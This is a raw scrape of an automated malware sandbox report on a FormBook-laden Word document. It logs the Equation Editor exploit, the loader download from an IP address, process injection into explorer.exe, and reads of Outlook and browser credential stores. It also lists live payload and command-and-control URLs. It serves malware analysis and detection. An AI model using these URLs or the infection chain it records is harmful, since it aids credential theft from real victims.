      Source: C:\Users\Public\cleanmgr_settings.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exeJump to behavior
      Source: explorer.exe, 00000009.00000000.1037527086.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1293943694.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000009.00000000.1037527086.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1293943694.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000009.00000000.1037527086.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1293943694.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\cleanmgr_settings.exeQueries volume information: C:\Users\Public\cleanmgr_settings.exe VolumeInformationJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Scripting      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Disable or Modify Tools      		1
      OS Credential Dumping      		2
      File and Directory Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium35
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts812
      Process Injection      		11
      Deobfuscate/Decode Files or Information      		1
      Credential API Hooking      		113
      System Information Discovery      		Remote Desktop Protocol1
      Man in the Browser      		Exfiltration Over Bluetooth11
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts23
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)1
      Scripting      		Security Account Manager121
      Security Software Discovery      		SMB/Windows Admin Shares1
      Data from Local System      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
      Obfuscated Files or Information      		NTDS2
      Process Discovery      		Distributed Component Object Model1
      Email Collection      		Scheduled Transfer115
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script22
      Software Packing      		LSA Secrets31
      Virtualization/Sandbox Evasion      		SSH1
      Credential API Hooking      		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Timestomp      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Rootkit      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
      Masquerading      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)31
      Virtualization/Sandbox Evasion      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron812
      Process Injection      		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 886485 Sample: Payment_document.docx.doc Startdate: 13/06/2023 Architecture: WINDOWS Score: 100 51 unesa.me 2->51 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 77 15 other signatures 2->77 11 EQNEDT32.EXE 12 2->11         started        15 WINWORD.EXE 319 61 2->15         started        signatures3 process4 dnsIp5 37 C:\Users\user\AppData\...\cleanmgr[1].exe, PE32+ 11->37 dropped 39 C:\Users\Public\cleanmgr_settings.exe, PE32+ 11->39 dropped 91 Office equation editor establishes network connection 11->91 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->93 18 cleanmgr_settings.exe 11->18         started        59 unesa.me 103.242.124.88, 443, 49181, 49182 IDNIC-UNESA-AS-IDUniversitasNegeriSurabayaID Indonesia 15->59 61 15.223.2.12, 49188, 49190, 80 AMAZON-02US United States 15->61 41 ~WRF{62062233-A800...5-74F0FF85D95C}.tmp, Composite 15->41 dropped 43 C:\Users\user\AppData\Local\...\74697CD7.doc, Rich 15->43 dropped 45 wewewewewewewewew#...wewewewewewe[1].doc, Rich 15->45 dropped file6 signatures7 process8 signatures9 63 Machine Learning detection for dropped file 18->63 65 Writes to foreign memory regions 18->65 67 Allocates memory in foreign processes 18->67 69 Injects a PE file into a foreign processes 18->69 21 RegSvcs.exe 18->21         started        process10 signatures11 79 Modifies the context of a thread in another process (thread injection) 21->79 81 Maps a DLL or memory area into another process 21->81 83 Sample uses process hollowing technique 21->83 85 2 other signatures 21->85 24 explorer.exe 8 21->24 injected process12 dnsIp13 53 ssl1.prod.systemdragon.com 104.17.158.1, 49196, 49197, 49198 CLOUDFLARENETUS United States 24->53 55 www.orbit4dads.com 188.114.96.3, 49199, 80 CLOUDFLARENETUS European Union 24->55 57 4 other IPs or domains 24->57 87 System process connects to network (likely due to code injection or exploit) 24->87 89 Performs DNS queries to domains with low reputation 24->89 28 cmmon32.exe 15 24->28         started        signatures14 process15 file16 47 C:\Users\user\AppData\...\416logrv.ini, data 28->47 dropped 49 C:\Users\user\AppData\...\416logri.ini, data 28->49 dropped 95 Detected FormBook malware 28->95 97 Tries to steal Mail credentials (via file / registry access) 28->97 99 Tries to harvest and steal browser information (history, passwords, etc) 28->99 101 4 other signatures 28->101 32 firefox.exe 1 28->32         started        signatures17 process18 file19 35 C:\Users\user\AppData\...\416logrf.ini, data 32->35 dropped

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Payment_document.docx.doc5%ReversingLabs
      Payment_document.docx.doc5%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wewewewewewewewew##################ewewewewewewe[1].doc100%AviraHEUR/Rtf.Malformed
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74697CD7.doc100%AviraHEUR/Rtf.Malformed
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{62062233-A800-4889-8BD5-74F0FF85D95C}.tmp100%AviraEXP/CVE-2017-11882.Gen
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cleanmgr[1].exe100%Joe Sandbox ML
      C:\Users\Public\cleanmgr_settings.exe100%Joe Sandbox ML

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://java.sun.com0%URL Reputationsafe
      http://15.223.2.12/102/cleanmgr.exej0%Avira URL Cloudsafe
      http://www.dyj97.comReferer:0%Avira URL Cloudsafe
      http://www.babolcai.sbs/hs95/0%Avira URL Cloudsafe
      http://15.223.2.12/we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doc0%Avira URL Cloudsafe
      http://www.folado.com/hs95/www.cell-phones-0406-da-sa-fb.xyz0%Avira URL Cloudsafe
      http://www.hezop.xyzReferer:0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.riders-app.store0%Avira URL Cloudsafe
      http://www.trhghfghfgh.com/hs95/www.riders-app.store0%Avira URL Cloudsafe
      http://www.renelle.net0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.riders-app.store/hs95/0%Avira URL Cloudsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.fire-og.com0%Avira URL Cloudsafe
      http://www.orbit4dads.com/hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl+Hl3kcfMygwQj+X1OmQGQg==&MJELdT=OHKPl0&sql=10%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.songsurvivor.com/hs95/0%Avira URL Cloudsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      http://www.babolcai.sbs/hs95/www.bscscan.help0%Avira URL Cloudsafe
      http://www.renelle.net/hs95/www.songsurvivor.com0%Avira URL Cloudsafe
      http://www.folado.comReferer:0%Avira URL Cloudsafe
      http://15.223.2.12/102/cleanmgr.exemmC:0%Avira URL Cloudsafe
      http://www.biyaheph.online/hs95/0%Avira URL Cloudsafe
      http://www.bscscan.helpReferer:0%Avira URL Cloudsafe
      http://www.riders-app.storeReferer:0%Avira URL Cloudsafe
      http://www.h9zpoi11.xyzReferer:0%Avira URL Cloudsafe
      http://www.cell-phones-0406-da-sa-fb.xyz0%Avira URL Cloudsafe
      http://www.h9zpoi11.xyz/hs95/0%Avira URL Cloudsafe
      http://www.bscscan.help0%Avira URL Cloudsafe
      http://www.bscscan.help/hs95/0%Avira URL Cloudsafe
      http://www.orbit4dads.comReferer:0%Avira URL Cloudsafe
      http://www.fire-og.comReferer:0%Avira URL Cloudsafe
      http://www.renelle.netReferer:0%Avira URL Cloudsafe
      http://www.biyaheph.onlineReferer:0%Avira URL Cloudsafe
      http://www.hezop.xyz/hs95/www.h9zpoi11.xyz100%Avira URL Cloudphishing
      www.marineqs.com/hs95/0%Avira URL Cloudsafe
      https://unesa.me/oaeopb0%Avira URL Cloudsafe
      http://www.cell-phones-0406-da-sa-fb.xyz/hs95/?3fq=7/SnWjC4QSLaRnvMg83QdIn7p4XRRaufQw3ayVgZFyp+C6x9joVaVP2qVgz+otvkZ3B/aw==&MJELdT=OHKPl0&sql=10%Avira URL Cloudsafe
      http://www.babolcai.sbsReferer:0%Avira URL Cloudsafe
      http://www.trhghfghfgh.com/hs95/0%Avira URL Cloudsafe
      http://www.folado.com/hs95/0%Avira URL Cloudsafe
      http://www.hezop.xyz0%Avira URL Cloudsafe
      http://www.hezop.xyz/hs95/100%Avira URL Cloudphishing
      http://www.biyaheph.online0%Avira URL Cloudsafe
      http://www.trhghfghfgh.comReferer:0%Avira URL Cloudsafe
      http://www.folado.com/hs95/?3fq=nMb/sedmpeBr7+ghqSOwC1xbmX5P5zzgM9CDx9I+q0VFP3WV4QSSvpToeK8jsn7ZNXtM7Q==&MJELdT=OHKPl0&sql=10%Avira URL Cloudsafe
      http://localizability/practices/XML.asp0%Avira URL Cloudsafe
      http://www.fire-og.com/hs95/0%Avira URL Cloudsafe
      http://15.223.2.12/102/cleanmgr.exe0%Avira URL Cloudsafe
      http://www.marineqs.comReferer:0%Avira URL Cloudsafe
      http://www.kyinyuanwoaini1.com/hs95/www.fire-og.com0%Avira URL Cloudsafe
      http://www.kyinyuanwoaini1.comReferer:0%Avira URL Cloudsafe
      http://www.orbit4dads.com/hs95/www.biyaheph.online0%Avira URL Cloudsafe
      http://www.bscscan.help/hs95/www.renelle.net0%Avira URL Cloudsafe
      http://www.songsurvivor.com0%Avira URL Cloudsafe
      http://www.marineqs.com/hs95/0%Avira URL Cloudsafe
      http://www.orbit4dads.com/hs95/0%Avira URL Cloudsafe
      http://www.h9zpoi11.xyz0%Avira URL Cloudsafe
      http://www.songsurvivor.com/hs95/www.kyinyuanwoaini1.com0%Avira URL Cloudsafe
      http://www.dyj97.com0%Avira URL Cloudsafe
      http://www.kyinyuanwoaini1.com/hs95/0%Avira URL Cloudsafe
      http://www.biyaheph.online/hs95/www.babolcai.sbs0%Avira URL Cloudsafe
      http://www.marineqs.com0%Avira URL Cloudsafe
      http://www.marineqs.com/hs95/www.trhghfghfgh.com0%Avira URL Cloudsafe
      http://www.kyinyuanwoaini1.com0%Avira URL Cloudsafe
      http://www.dyj97.com/hs95/0%Avira URL Cloudsafe
      http://www.dyj97.com/hs95/www.orbit4dads.com0%Avira URL Cloudsafe
      http://www.cell-phones-0406-da-sa-fb.xyz/hs95/0%Avira URL Cloudsafe
      http://www.renelle.net/hs95/0%Avira URL Cloudsafe
      http://localizability/practices/XMLConfiguration.asp0%Avira URL Cloudsafe
      http://www.h9zpoi11.xyz/hs95/www.marineqs.com0%Avira URL Cloudsafe
      http://www.folado.com0%Avira URL Cloudsafe
      http://www.cell-phones-0406-da-sa-fb.xyzReferer:0%Avira URL Cloudsafe
      http://www.orbit4dads.com0%Avira URL Cloudsafe
      http://www.cell-phones-0406-da-sa-fb.xyz/hs95/www.dyj97.com0%Avira URL Cloudsafe
      http://www.trhghfghfgh.com0%Avira URL Cloudsafe
      http://www.songsurvivor.comReferer:0%Avira URL Cloudsafe
      https://www.orbit4dads.com/hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl0%Avira URL Cloudsafe
      http://www.babolcai.sbs0%Avira URL Cloudsafe
      http://www.fire-og.com/hs95/www.hezop.xyz0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.orbit4dads.com
      		188.114.96.3
      		truetrue
        		unknown
        ssl1.prod.systemdragon.com
        		104.17.158.1
        		truetrue
          		unknown
          unesa.me
          		103.242.124.88
          		truetrue
            		unknown
            www.folado.com
            		13.248.169.48
            		truetrue
              		unknown
              www.dyj97.com
              		unknown
              		unknowntrue
                		unknown
                www.cell-phones-0406-da-sa-fb.xyz
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://15.223.2.12/we/wewewewewewewewew%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ewewewewewewe.doctrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.orbit4dads.com/hs95/?3fq=xw7PVRuINTi6KhkfIPSvnkLROuDczzMqojET/rvGnYC4wzzl+Hl3kcfMygwQj+X1OmQGQg==&MJELdT=OHKPl0&sql=1true
                  • Avira URL Cloud: safe
                  		unknown
                  https://unesa.me/oaeopbtrue
                  • Avira URL Cloud: safe
                  		unknown
                  www.marineqs.com/hs95/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.folado.com/hs95/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.cell-phones-0406-da-sa-fb.xyz/hs95/?3fq=7/SnWjC4QSLaRnvMg83QdIn7p4XRRaufQw3ayVgZFyp+C6x9joVaVP2qVgz+otvkZ3B/aw==&MJELdT=OHKPl0&sql=1true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.folado.com/hs95/?3fq=nMb/sedmpeBr7+ghqSOwC1xbmX5P5zzgM9CDx9I+q0VFP3WV4QSSvpToeK8jsn7ZNXtM7Q==&MJELdT=OHKPl0&sql=1true
                  • Avira URL Cloud: safe
                  		unknown
                  http://15.223.2.12/102/cleanmgr.exetrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.cell-phones-0406-da-sa-fb.xyz/hs95/true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.babolcai.sbs/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.trhghfghfgh.com/hs95/www.riders-app.storeexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://15.223.2.12/102/cleanmgr.exejEQNEDT32.EXE, 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.riders-app.storeexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.renelle.netexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.hezop.xyzReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://treyresearch.netexplorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.riders-app.store/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dyj97.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.folado.com/hs95/www.cell-phones-0406-da-sa-fb.xyzexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fire-og.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.songsurvivor.com/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://computername/printers/printername/.printerexplorer.exe, 00000009.00000000.1042829811.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://www.autoitscript.com/autoit3explorer.exe, 00000009.00000002.1293516891.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://servername/isapibackend.dllexplorer.exe, 00000009.00000002.1301045623.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://15.223.2.12/102/cleanmgr.exemmC:EQNEDT32.EXE, 00000005.00000002.1028643416.00000000008FF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.windows.com/pctv.explorer.exe, 00000009.00000000.1039427835.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                      		high
                      http://www.babolcai.sbs/hs95/www.bscscan.helpexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.biyaheph.online/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.renelle.net/hs95/www.songsurvivor.comexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.folado.comReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.riders-app.storeReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.h9zpoi11.xyz/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.bscscan.helpReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.hezop.xyz/hs95/explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://www.h9zpoi11.xyzReferer:explorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.cell-phones-0406-da-sa-fb.xyzexplorer.exe, 00000009.00000002.1303955744.000000000881E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.1305552060.000000000B32D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.1306188239.000000000BF89000.00000004.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
